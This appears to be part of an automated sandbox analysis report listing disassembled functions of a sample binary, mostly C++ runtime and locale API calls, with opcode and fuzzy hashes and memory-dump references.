            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID:
            • String ID: 0
            • API String ID: 0-4108050209
            • Opcode ID: d80e1159d5736ca869e493ebe0005fbe063c08a8c5c1aff8f32ff54c1ac11689
            • Instruction ID: 2ad0825927ddb4f33378cb0f697ca73b0b40495c99b4d70c6df669dcba494397
            • Opcode Fuzzy Hash: d80e1159d5736ca869e493ebe0005fbe063c08a8c5c1aff8f32ff54c1ac11689
            • Instruction Fuzzy Hash: BFB1ACF4E0460A8BCF34CE68C891ABEB7E5BF47320F16061AD892D7681D734E945EB51
            APIs
              • Part of subcall function 00FA9827: GetLastError.KERNEL32(?,?,00F9F6A5,00FC3A10,0000000C), ref: 00FA982B
              • Part of subcall function 00FA9827: SetLastError.KERNEL32(00000000), ref: 00FA98CD
            • EnumSystemLocalesW.KERNEL32(00FB2693,00000001,00000000,?,-00000050,?,00FB2CC4,00000000,?,?,?,00000055,?), ref: 00FB25DF
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: ErrorLast$EnumLocalesSystem
            • String ID:
            • API String ID: 2417226690-0
            • Opcode ID: 0ca7c8451c5ee0864f1258006857851f4903581893c1f57b96a1b76286a7f02f
            • Instruction ID: b32d98f7d37b279cd9719b983cbacab6fa6cfc14e4e66fa2647ea785d340caa5
            • Opcode Fuzzy Hash: 0ca7c8451c5ee0864f1258006857851f4903581893c1f57b96a1b76286a7f02f
            • Instruction Fuzzy Hash: D611E9366047055FDB289F3AC8A16BAB792FF84368B18442DE94647A40D775B942DF40
            APIs
              • Part of subcall function 00FA9827: GetLastError.KERNEL32(?,?,00F9F6A5,00FC3A10,0000000C), ref: 00FA982B
              • Part of subcall function 00FA9827: SetLastError.KERNEL32(00000000), ref: 00FA98CD
            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00FB2990,00000000,00000000,?), ref: 00FB2B41
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: ErrorLast$InfoLocale
            • String ID:
            • API String ID: 3736152602-0
            • Opcode ID: 2bbbd6dc0e87e632ce5fcb379237f72411dac5dc64344bdb4c22f59f7aa2e549
            • Instruction ID: 16f8381a613bd0beae650c2b2305258fd690529696928afb1b98fb6139ff32f2
            • Opcode Fuzzy Hash: 2bbbd6dc0e87e632ce5fcb379237f72411dac5dc64344bdb4c22f59f7aa2e549
            • Instruction Fuzzy Hash: 76F02D32D001167BDB685F26CC05BFA7758EB80764F048524EC11A3160DF74FD01EE90
            APIs
              • Part of subcall function 00FA9827: GetLastError.KERNEL32(?,?,00F9F6A5,00FC3A10,0000000C), ref: 00FA982B
              • Part of subcall function 00FA9827: SetLastError.KERNEL32(00000000), ref: 00FA98CD
            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00FB24CF
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: ErrorLast$InfoLocale
            • String ID: utf8
            • API String ID: 3736152602-905460609
            • Opcode ID: 8c14358fc2c00eb4afb40119636c754e4d2d9c2137125a58372307b72a0d655d
            • Instruction ID: e4add1679b0f6379518263243c7081201ceb8330d6aa0b48e91aadf34e2bccaf
            • Opcode Fuzzy Hash: 8c14358fc2c00eb4afb40119636c754e4d2d9c2137125a58372307b72a0d655d
            • Instruction Fuzzy Hash: CCF0C872A00109ABD714AB35DC5AEFE73ECDB45725F110179B902D7281EA7CAD05AB90
            APIs
              • Part of subcall function 00FA9827: GetLastError.KERNEL32(?,?,00F9F6A5,00FC3A10,0000000C), ref: 00FA982B
              • Part of subcall function 00FA9827: SetLastError.KERNEL32(00000000), ref: 00FA98CD
            • EnumSystemLocalesW.KERNEL32(00FB28E6,00000001,?,?,-00000050,?,00FB2C88,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00FB2652
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: ErrorLast$EnumLocalesSystem
            • String ID:
            • API String ID: 2417226690-0
            • Opcode ID: 07d2e531b0dcc42764aa88411bbadb38a08bbfaff9419032f35139524636a43d
            • Instruction ID: 42df431fa1a2eccbcff3563e0034cd505fb21d9b5cb656947ad38426d13c88ec
            • Opcode Fuzzy Hash: 07d2e531b0dcc42764aa88411bbadb38a08bbfaff9419032f35139524636a43d
            • Instruction Fuzzy Hash: C0F0F0366003045FDB256F3ADC81AFABB96FF81768F05842DF9458B690D6B5AC02EE50
            APIs
              • Part of subcall function 00FA2F71: EnterCriticalSection.KERNEL32(?,?,00FA94FF,?,00FC3DE0,00000008,00FA96C3,?,?,?), ref: 00FA2F80
            • EnumSystemLocalesW.KERNEL32(00FA89D9,00000001,00FC3D80,0000000C,00FA8E48,00000000), ref: 00FA8A1E
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: CriticalEnterEnumLocalesSectionSystem
            • String ID:
            • API String ID: 1272433827-0
            • Opcode ID: c31c48f89e14c0f9050ceb6f76ce369d325a264f6f5555b38a28811e1a33449b
            • Instruction ID: 88782096af4226ef1867a9bc878d88df16428660e09a8a1bff7e7adbbaa41a6c
            • Opcode Fuzzy Hash: c31c48f89e14c0f9050ceb6f76ce369d325a264f6f5555b38a28811e1a33449b
            • Instruction Fuzzy Hash: 09F062B6A00208DFD714DF98E842B9E77F0EB09760F10451AF411DB290DB7D59419F45
            APIs
              • Part of subcall function 00FA9827: GetLastError.KERNEL32(?,?,00F9F6A5,00FC3A10,0000000C), ref: 00FA982B
              • Part of subcall function 00FA9827: SetLastError.KERNEL32(00000000), ref: 00FA98CD
            • EnumSystemLocalesW.KERNEL32(00FB247B,00000001,?,?,?,00FB2CE6,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00FB2559
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: ErrorLast$EnumLocalesSystem
            • String ID:
            • API String ID: 2417226690-0
            • Opcode ID: 31aa327608c2ba20b63fbfa79a52754933646e48f87e17b114fd87dd027ebb58
            • Instruction ID: bb709f018585f59c8fbf8044f322b040a6a225dac5030c6ec9adc7287fc5ef0a
            • Opcode Fuzzy Hash: 31aa327608c2ba20b63fbfa79a52754933646e48f87e17b114fd87dd027ebb58
            • Instruction Fuzzy Hash: E8F0E53670020597CB14DF3AEC95AAABF94EFC2764F0A405AEA068B651C675D842EF90
            APIs
            • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00FA7E73,?,20001004,00000000,00000002,?,?,00FA7475), ref: 00FA8F80
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: InfoLocale
            • String ID:
            • API String ID: 2299586839-0
            • Opcode ID: e4b09b146facf5af8241d810400e2f0870a93ee7b214188921ae116621e4adb7
            • Instruction ID: 3cefc44eec729a8b8045f09f420954b1ec1b676d78994ce2a417fd266aff8c11
            • Opcode Fuzzy Hash: e4b09b146facf5af8241d810400e2f0870a93ee7b214188921ae116621e4adb7
            • Instruction Fuzzy Hash: 5AE04F7690421DBBCF222F65DC09A9E3E2AEF457A0F048111FC0565121CFB99D21BED5
            APIs
            • SetUnhandledExceptionFilter.KERNEL32(Function_0000B802,00F9AE2A), ref: 00F9B7FB
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: ExceptionFilterUnhandled
            • String ID:
            • API String ID: 3192549508-0
            • Opcode ID: 309cfc051e5c3e4d34466be7316a00a905929e4f45f887a1d9c7fdde5da3278d
            • Instruction ID: f9cbfb53460df0b083f533ebd8a4e16de1ee60b2ecee9e28395f9a1b5a46e92f
            • Opcode Fuzzy Hash: 309cfc051e5c3e4d34466be7316a00a905929e4f45f887a1d9c7fdde5da3278d
            • Instruction Fuzzy Hash:
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: HeapProcess
            • String ID:
            • API String ID: 54951025-0
            • Opcode ID: 016d6c6d7a4b1589632cb7b25375f9bfd2dedb8b9afbc23c1152c651523611b5
            • Instruction ID: 46ca3f41f46eec6a0391d0ec95cd473e6f376f70b112ab0ae4f3e3b1479197c2
            • Opcode Fuzzy Hash: 016d6c6d7a4b1589632cb7b25375f9bfd2dedb8b9afbc23c1152c651523611b5
            • Instruction Fuzzy Hash: 09A02230202208CF83308F30AB8830E3BE8BA082C0B0800ACA00CC0028EF3C80A8BF02
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: c40462530d1634de5f1ed506cdc9d9bcd32bdc8a5f714ca53be199472989dfe9
            • Instruction ID: ed9bf44789e9b2ff453f3ea2b9b8ec2dd02a42359176b8436e90627ea26c59c7
            • Opcode Fuzzy Hash: c40462530d1634de5f1ed506cdc9d9bcd32bdc8a5f714ca53be199472989dfe9
            • Instruction Fuzzy Hash: 3CE08672915238EBC714DB88D904D49F3FCE785B90B1144A6B501D3110C2B4DF00DBE0
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b5a630a47bc7cf2c319f03ac5adf3fe6ea5721287783c53932d153f0d08af9e9
            • Instruction ID: 5ec84c62cb7151e96a3f56d3ba5f4c2fee6c0686a3c3534c74d9345cd08e2571
            • Opcode Fuzzy Hash: b5a630a47bc7cf2c319f03ac5adf3fe6ea5721287783c53932d153f0d08af9e9
            • Instruction Fuzzy Hash: 5FC08CB4400A0086CE298D1082B23AA3358A3D7BD2F88048CD45B8B642C52EDC8AF610
            APIs
            • std::_Lockit::_Lockit.LIBCPMT ref: 00F94E9D
            • std::_Lockit::_Lockit.LIBCPMT ref: 00F94EB7
            • std::_Lockit::~_Lockit.LIBCPMT ref: 00F94ED8
            • std::_Lockit::~_Lockit.LIBCPMT ref: 00F94F04
            • std::_Lockit::~_Lockit.LIBCPMT ref: 00F94F39
            • std::_Lockit::_Lockit.LIBCPMT ref: 00F94F76
            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00F94FC7
            • __Getctype.LIBCPMT ref: 00F94FDE
            • std::_Facet_Register.LIBCPMT ref: 00F94FF7
            • std::_Lockit::~_Lockit.LIBCPMT ref: 00F95010
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_GetctypeLocinfo::_Locinfo_ctorRegister
            • String ID: bad locale name
            • API String ID: 1407599034-1405518554
            • Opcode ID: 9a4374c97ec8f500ca751f3d8069860d5a2e87be66665c326c907cad7af9e3c9
            • Instruction ID: bac0dd865b7341019b4c8012962237d22a0e13fd5cec214a424894d328104d9c
            • Opcode Fuzzy Hash: 9a4374c97ec8f500ca751f3d8069860d5a2e87be66665c326c907cad7af9e3c9
            • Instruction Fuzzy Hash: 73B11431A006408FEB25DF68C845BAAB7F1FF84724F14415DF89897391C73AAC46DB91
            APIs
            • std::_Lockit::_Lockit.LIBCPMT ref: 00F953DD
            • std::_Lockit::_Lockit.LIBCPMT ref: 00F953F7
            • std::_Lockit::~_Lockit.LIBCPMT ref: 00F95418
            • std::_Lockit::~_Lockit.LIBCPMT ref: 00F95444
            • std::_Lockit::~_Lockit.LIBCPMT ref: 00F95479
            • std::_Lockit::_Lockit.LIBCPMT ref: 00F954B6
            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00F95507
            • std::_Facet_Register.LIBCPMT ref: 00F95526
            • std::_Lockit::~_Lockit.LIBCPMT ref: 00F9553F
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_Locinfo::_Locinfo_ctorRegister
            • String ID: bad locale name
            • API String ID: 3434717313-1405518554
            • Opcode ID: 3d95015b8959a3edf68ad21be455bad0287955ed9fb3ff689c01beb479f5ec2a
            • Instruction ID: b11d72e26f19784baac78d86ce159d89a759578a0901039b9647d0b17f2385bd
            • Opcode Fuzzy Hash: 3d95015b8959a3edf68ad21be455bad0287955ed9fb3ff689c01beb479f5ec2a
            • Instruction Fuzzy Hash: F841D231A043409FEB55EF28D844B5AB7E0EF90B21F14041DF9888B241DB7AE945DBA3
            APIs
            • std::_Lockit::_Lockit.LIBCPMT ref: 00F964A0
            • std::_Lockit::_Lockit.LIBCPMT ref: 00F964BA
            • std::_Lockit::~_Lockit.LIBCPMT ref: 00F964DB
            • std::_Lockit::~_Lockit.LIBCPMT ref: 00F9650A
            • std::_Lockit::_Lockit.LIBCPMT ref: 00F96571
            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00F965CE
            • __Getctype.LIBCPMT ref: 00F965E5
            • std::_Facet_Register.LIBCPMT ref: 00F9662A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: std::_$Lockit$Lockit::_$Lockit::~_$Facet_GetctypeLocinfo::_Locinfo_ctorRegister
            • String ID: bad locale name
            • API String ID: 2622896957-1405518554
            • Opcode ID: e2cdb1f5acb9ccaea1afb6ae089304dc59ad1baef898987aa352a3975e3f47b0
            • Instruction ID: f4d5e3bb7583b0467e574806ea9544548745ff06fbc3887dc735232950cf70a5
            • Opcode Fuzzy Hash: e2cdb1f5acb9ccaea1afb6ae089304dc59ad1baef898987aa352a3975e3f47b0
            • Instruction Fuzzy Hash: EE51F271D047808FEB31DF24C544B5AB7F0BF94310F1A495CE5899B216EB39E944DB92
            APIs
            • std::_Lockit::_Lockit.LIBCPMT ref: 00F969B1
            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00F96A06
            • Concurrency::cancel_current_task.LIBCPMT ref: 00F96B7E
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: std::_$Concurrency::cancel_current_taskLocinfo::_Locinfo_ctorLockitLockit::_
            • String ID: ,$.$bad locale name$false$true
            • API String ID: 1995332507-3659324578
            • Opcode ID: adcbedb619f402fdf01331fe87b44e7f2f67df700bc1f9ed3249cc420005635e
            • Instruction ID: 4eb60df4792b357686b24b409e084c3ed5db35e3bcc8e47132e2dc11df3fc7d1
            • Opcode Fuzzy Hash: adcbedb619f402fdf01331fe87b44e7f2f67df700bc1f9ed3249cc420005635e
            • Instruction Fuzzy Hash: 0F519FB19083859FE710DF68C941B9BB7E4BF85304F044A2DF98897241E774E648DBA3
            APIs
            • std::_Lockit::_Lockit.LIBCPMT ref: 00F96BE2
            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00F96C37
            • Concurrency::cancel_current_task.LIBCPMT ref: 00F96D01
            • Concurrency::cancel_current_task.LIBCPMT ref: 00F96D06
            • Concurrency::cancel_current_task.LIBCPMT ref: 00F96D0B
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: Concurrency::cancel_current_task$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
            • String ID: bad locale name$false$true
            • API String ID: 164343898-1062449267
            • Opcode ID: f056d352a0d86030cf1759b2440a7912a04cdbe7c862d58df36fff45f7bea443
            • Instruction ID: 5f7b4c774aa3b78151104ef6d7a91df1b5b113a30a77851e377c33ac8680b593
            • Opcode Fuzzy Hash: f056d352a0d86030cf1759b2440a7912a04cdbe7c862d58df36fff45f7bea443
            • Instruction Fuzzy Hash: 9541E1706083419FEB21EF64D941B4BBBE0BF85310F04482DF599CB282D7B9D508DBA2
            APIs
            • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00F9AD33
            • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00F9AD41
            • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00F9AD52
            • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00F9AD63
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: AddressProc$HandleModule
            • String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
            • API String ID: 667068680-1247241052
            • Opcode ID: df529434a14001c94c345dfa7ec791de5457325389c1820e4f674b337ba87dc5
            • Instruction ID: c7e0738d264b531bba74eb25255e96ba7dfd1d4cb0dfa5e6c6368a4910c5c6f5
            • Opcode Fuzzy Hash: df529434a14001c94c345dfa7ec791de5457325389c1820e4f674b337ba87dc5
            • Instruction Fuzzy Hash: 52E0EC31591314AB83506F76BC4D8953AE8FA0AB867040316F501D2154DBB98401AFA2
            APIs
            • type_info::operator==.LIBVCRUNTIME ref: 00F9E627
            • ___TypeMatch.LIBVCRUNTIME ref: 00F9E735
            • _UnwindNestedFrames.LIBCMT ref: 00F9E887
            • CallUnexpected.LIBVCRUNTIME ref: 00F9E8A2
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
            • String ID: csm$csm$csm
            • API String ID: 2751267872-393685449
            • Opcode ID: b6873b44fd8472d44ebd4d062016fe645f38e9eae7ac639e508baf54ce5b8287
            • Instruction ID: 1746c418a0efcaf4858df66bf20244be461bba406c48bcbed4756f81dd19b7fd
            • Opcode Fuzzy Hash: b6873b44fd8472d44ebd4d062016fe645f38e9eae7ac639e508baf54ce5b8287
            • Instruction Fuzzy Hash: 8AB18A71C00209EFEF29DFA4C8819AEBBB5FF54320F14455AE8116B212D735EA51EF92
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID: 0-3907804496
            • Opcode ID: 6f6551766e78dfaf1902ac4a10d661e029697619da613869b26e695c2ee2e33e
            • Instruction ID: 35ca70cfbcba52b048667cb8d6213c84bb067674c80a36431a5b8a7aef520088
